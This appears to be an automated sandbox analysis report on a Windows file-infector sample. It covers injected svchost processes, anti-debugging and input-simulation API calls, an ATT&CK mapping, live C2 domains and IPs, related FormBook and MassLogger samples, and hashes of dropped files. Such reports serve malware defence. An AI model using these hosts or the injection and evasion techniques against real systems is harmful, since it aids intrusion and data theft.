          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034309AD mov eax, dword ptr fs:[00000030h]3_2_034309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034309AD mov eax, dword ptr fs:[00000030h]3_2_034309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B89B3 mov esi, dword ptr fs:[00000030h]3_2_034B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B89B3 mov eax, dword ptr fs:[00000030h]3_2_034B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B89B3 mov eax, dword ptr fs:[00000030h]3_2_034B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03442840 mov ecx, dword ptr fs:[00000030h]3_2_03442840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03460854 mov eax, dword ptr fs:[00000030h]3_2_03460854
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03434859 mov eax, dword ptr fs:[00000030h]3_2_03434859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03434859 mov eax, dword ptr fs:[00000030h]3_2_03434859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BE872 mov eax, dword ptr fs:[00000030h]3_2_034BE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BE872 mov eax, dword ptr fs:[00000030h]3_2_034BE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C6870 mov eax, dword ptr fs:[00000030h]3_2_034C6870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C6870 mov eax, dword ptr fs:[00000030h]3_2_034C6870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BC810 mov eax, dword ptr fs:[00000030h]3_2_034BC810
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_004580A9
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A155
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0042A124 SetUnhandledExceptionFilter,0_2_0042A124
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B21361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B21361
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B24C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B24C7B

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 290D008
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004587B1 LogonUserW,0_2_004587B1
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00464C53 mouse_event,0_2_00464C53
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\UaOJAOMxcU.exe"Jump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00457CAF
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0045874B
          Source: UaOJAOMxcU.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: UaOJAOMxcU.exeBinary or memory string: Shell_TrayWnd
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0042862B cpuid 0_2_0042862B
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00434E87
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00441E06 GetUserNameW,0_2_00441E06
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00433F3A
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0
          Source: UaOJAOMxcU.exe, 00000000.00000002.2062868407.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procmon.exe
          Source: UaOJAOMxcU.exe, 00000000.00000002.2062868407.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcupdate.exe

          Stealing of Sensitive Information

Source: Yara match | File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2399922107.0000000003190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2399407807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: UaOJAOMxcU.exe | Binary or memory string: WIN_81
Source: UaOJAOMxcU.exe | Binary or memory string: WIN_XP
Source: UaOJAOMxcU.exe | Binary or memory string: WIN_XPe
Source: UaOJAOMxcU.exe | Binary or memory string: WIN_VISTA
Source: UaOJAOMxcU.exe | Binary or memory string: WIN_7
Source: UaOJAOMxcU.exe | Binary or memory string: WIN_8
Source: UaOJAOMxcU.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality

Source: Yara match | File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2399922107.0000000003190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2399407807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket

MITRE ATT&CK matrix (tactic columns): Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts
          2
          Native API
          1
          DLL Side-Loading
          1
          Exploitation for Privilege Escalation
          1
          Disable or Modify Tools
          21
          Input Capture
          2
          System Time Discovery
          1
          Taint Shared Content
          1
          Archive Collected Data
          1
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts2
          Service Execution
          2
          Valid Accounts
          1
          DLL Side-Loading
          1
          Deobfuscate/Decode Files or Information
          LSASS Memory1
          Account Discovery
          Remote Desktop Protocol21
          Input Capture
          1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt1
          Windows Service
          2
          Valid Accounts
          3
          Obfuscated Files or Information
          Security Account Manager1
          File and Directory Discovery
          SMB/Windows Admin Shares3
          Clipboard Data
          2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
          Access Token Manipulation
          1
          Software Packing
          NTDS125
          System Information Discovery
          Distributed Component Object ModelInput Capture12
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
          Windows Service
          1
          Timestomp
          LSA Secrets261
          Security Software Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts212
          Process Injection
          1
          DLL Side-Loading
          Cached Domain Credentials2
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
          Masquerading
          DCSync3
          Process Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
          Valid Accounts
          Proc Filesystem1
          Application Window Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
          Virtualization/Sandbox Evasion
          /etc/passwd and /etc/shadow1
          System Owner/User Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
          Access Token Manipulation
          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd212
          Process Injection
          Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Source | Detection | Scanner | Label
UaOJAOMxcU.exe | 78% | Virustotal |
UaOJAOMxcU.exe | 96% | ReversingLabs | Win32.Virus.Expiro
UaOJAOMxcU.exe | 100% | Avira | W32/Infector.Gen
UaOJAOMxcU.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\System32\AppVClient.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\System32\alg.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML |
C:\Windows\System32\AppVClient.exe | 100% | Joe Sandbox ML |
C:\Windows\System32\alg.exe | 100% | Joe Sandbox ML |
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label
http://54.244.188.177/ | 100% | Avira URL Cloud | malware
http://54.244.188.177/rhimsaly | 100% | Avira URL Cloud | malware
http://54.244.188.177/rhimsalyUS | 100% | Avira URL Cloud | malware
http://54.244.188.177/2 | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ssbzmoy.biz | 18.141.10.107 | true | false | | high
pywolwnvd.biz | 54.244.188.177 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://pywolwnvd.biz/rhimsaly | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://54.244.188.177/rhimsaly | UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000C1D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://54.244.188.177/ | UaOJAOMxcU.exe, 00000000.00000002.2062897697.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000C17000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://pywolwnvd.biz/ | UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000B88000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://54.244.188.177/2 | UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000C17000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://54.244.188.177/rhimsalyUS | UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000BA1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
54.244.188.177 | pywolwnvd.biz | United States | 16509 | AMAZON-02US | false
                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1588231
                  Start date and time:2025-01-10 22:55:04 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 18s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:UaOJAOMxcU.exe
                  renamed because original name is a hash value
                  Original Sample Name:2a60ca525c89948993b31e2e086a88455e71363863cfc7f835a47c1b657ea4a5.exe
                  Detection:MAL
                  Classification:mal100.spre.troj.evad.winEXE@5/8@2/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 77%
                  • Number of executed functions: 74
                  • Number of non-executed functions: 245
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Report size exceeded maximum capacity and may have missing disassembly code.
Time | Type | Description
16:55:56 | API Interceptor | 1x Sleep call for process: UaOJAOMxcU.exe modified
16:56:28 | API Interceptor | 3x Sleep call for process: svchost.exe modified
Match: 54.244.188.177
Associated Sample Name / URL | Detection | Threat Name | Context
SABXJ1B5c8.exe | malicious | MassLogger RAT | cvgrf.biz/kmpia
I3LPkQh2an.exe | malicious | FormBook | lrxdmhrr.biz/rwlfutjcp
OVZizpEU7Q.exe | malicious | FormBook | pywolwnvd.biz/wlyolqts
RJKUWSGxej.exe | malicious | AgentTesla, RedLine | lrxdmhrr.biz/tbbwyfgx
PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | lrxdmhrr.biz/fncvigkebkn
REQUEST FOR QUOTATION 1307-RFQ.exe | malicious | MassLogger RAT | cvgrf.biz/dy
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | cvgrf.biz/ubwy
INV_NE_02_2034388.exe | malicious | FormBook | cvgrf.biz/mddjrljmh
Shipment Notification.exe | malicious | FormBook | cvgrf.biz/pm
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | cvgrf.biz/yfypviummaqwyuq
Match: ssbzmoy.biz
Associated Sample Name / URL | Detection | Threat Name | Context
SABXJ1B5c8.exe | malicious | MassLogger RAT | 18.141.10.107
I3LPkQh2an.exe | malicious | FormBook | 18.141.10.107
OVZizpEU7Q.exe | malicious | FormBook | 18.141.10.107
RJKUWSGxej.exe | malicious | AgentTesla, RedLine | 18.141.10.107
PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 18.141.10.107
REQUEST FOR QUOTATION 1307-RFQ.exe | malicious | MassLogger RAT | 18.141.10.107
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 18.141.10.107
INV_NE_02_2034388.exe | malicious | FormBook | 18.141.10.107
Shipment Notification.exe | malicious | FormBook | 18.141.10.107
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 18.141.10.107

Match: pywolwnvd.biz
Associated Sample Name / URL | Detection | Threat Name | Context
SABXJ1B5c8.exe | malicious | MassLogger RAT | 54.244.188.177
I3LPkQh2an.exe | malicious | FormBook | 54.244.188.177
OVZizpEU7Q.exe | malicious | FormBook | 54.244.188.177
RJKUWSGxej.exe | malicious | AgentTesla, RedLine | 54.244.188.177
PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 54.244.188.177
REQUEST FOR QUOTATION 1307-RFQ.exe | malicious | MassLogger RAT | 54.244.188.177
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 54.244.188.177
INV_NE_02_2034388.exe | malicious | FormBook | 54.244.188.177
Shipment Notification.exe | malicious | FormBook | 54.244.188.177
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 54.244.188.177
Match: AMAZON-02US
Associated Sample Name / URL | Detection | Threat Name | Context
0Wu31IhwGO.exe | malicious | FormBook | 18.139.62.226
https://www.shinsengumiusa.com/mrloskie | malicious | Unknown | 3.120.85.61
SABXJ1B5c8.exe | malicious | MassLogger RAT | 18.141.10.107
fFoOcuxK7M.exe | malicious | FormBook | 13.248.169.48
NFhRxwbegd.exe | malicious | FormBook | 18.139.62.226
I3LPkQh2an.exe | malicious | FormBook | 18.141.10.107
statement.doc | malicious | KnowBe4 | 52.217.123.201
9MZZG92yMO.exe | malicious | FormBook | 76.223.67.189
aBEh0fsi2c.exe | malicious | FormBook | 13.248.169.48
EIvidclKOb.exe | malicious | FormBook | 13.228.81.39
                  No context
                  No context
                  Process:C:\Users\user\Desktop\UaOJAOMxcU.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):1658880
                  Entropy (8bit):4.312985221034903
                  Encrypted:false
                  SSDEEP:24576:jxGBcmljVg9N9JMlDlfjRiVuVsWt5MJMs:tGy+RgFIDRRAubt5M
                  MD5:717063427E4960E26A9AEEA93FFA8BC8
                  SHA1:BD19BECB164ECEA8D90A5EF9755226A894EFF4B1
                  SHA-256:CA1F2725C7EAE6CE31EBCF905FC9F264B76E8093BEBD3827ED61900A7E435FB4
                  SHA-512:2A898ED7A3826B6947F228C68D6401C0EAFA6E9352B240290AF034FEE5BE80E541B8C97C404EE315584D03EEA50BC7C29A40D3B8976AB6BDD3B5441EAE7564BF
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................i......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...............`..............@...........................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\UaOJAOMxcU.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):288768
                  Entropy (8bit):7.994960411237261
                  Encrypted:true
                  SSDEEP:6144:p3H4EZg9lZ27hYiL2iAW1Ia3czJbCxG1CzCHid/W/FIphWQZmSjjPpo:pXb+rCYieW1IpzJGmCu+YO/WQZmSjVo
                  MD5:80CFECD52CB7E58C3B6F05C33B4D11B8
                  SHA1:C3F6BECD0F6B737A415EF7B5DC87FFD53D71BE55
                  SHA-256:E38AB7E46B69C8DDA3226EBF64275D1A32E9D62183D1ACDA2C5169572E1F86EF
                  SHA-512:A3A5B2446EC446223AFDB11C166AFCB15AE638486B65EE6341AEAA42A747BC66DC93D977C6009533222D54827B5936F16A6B804BDD1E11C4EF042E35A0B40A32
                  Malicious:false
                  Reputation:low
                  Preview:...T7SOA3G3Q..DT.J8BBVT4.OA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBV.4SOO(.=Q.K.u.Kt.c.<] o1E(T#-/d7;$V-6v6Qs=4YgZ?l...z'W&'xY9YkA7G3QLB=US.."%.iT4.|W .K..n:-.X....3(.-.p"#..#[*.63.SOA7G3QL..TZ.9CB....OA7G3QLB.TXK3CIVTbWOA7G3QLBDTOJ8BRVT4#KA7GsQLRDTZH8BDVT4SOA7A3QLBDTZJHFBVV4SOA7G1Q..DTJJ8RBVT4COA'G3QLBDDZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBj ?2LBBV.aWOA'G3Q.FDTJJ8BBVT4SOA7G3QlBD4ZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3Q
                  Process:C:\Users\user\Desktop\UaOJAOMxcU.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):14584
                  Entropy (8bit):7.636546073976075
                  Encrypted:false
                  SSDEEP:384:ITYznwreDrLYun6MkQ7db5lYRgvchXhsLp7NK6NYWp3isCLt:IAwaDrL4Qhp0YLpQZsCx
                  MD5:A107AF6FF42A43A2E5AF0A79FA2E7105
                  SHA1:8B696A4B687597CC2265E98863B81E3A8873BAD7
                  SHA-256:F983A3F5288BDCDDA51BE795022FEA62341079829667EBCADF9D53B4D9CF6FFB
                  SHA-512:F228C9236FDF5C92BABF897190E6F526BAC9AE446AD2443CC2FDE88E07A2144208E2269786EDD2BB675A65E1103DB7149990AD85EE23FB5EF71689B7331A2203
                  Malicious:false
                  Reputation:low
                  Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                  Process:C:\Users\user\Desktop\UaOJAOMxcU.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:dropped
                  Size (bytes):143378
                  Entropy (8bit):2.9925060211517374
                  Encrypted:false
                  SSDEEP:96:AIXLr4w+F05BnOohpJ0FlenMA6ZnmLdGcu19I6yKup3PfrWVjjvqnBaAJZdjureP:H3bjeeDRGcu19I6yKup3nrWVHqnBaA
                  MD5:BC1E1F9966D435C3C894D80D25B16E76
                  SHA1:6060AA56E06283A17819958ACACA90E50F654167
                  SHA-256:BCFA229B340EB1F832B3C3073E6483AD0E25693402C0FC3885BF5889438CEA2A
                  SHA-512:0EE8A91C0D5F3B625293CCE5E3F46B8AC73EBAF3AFC8225A98161BAC3AAD39D694D7DAA2731D78B8DF09F6505274899737845531AAD75ACA2E5746FB9ACD3858
                  Malicious:false
                  Reputation:low
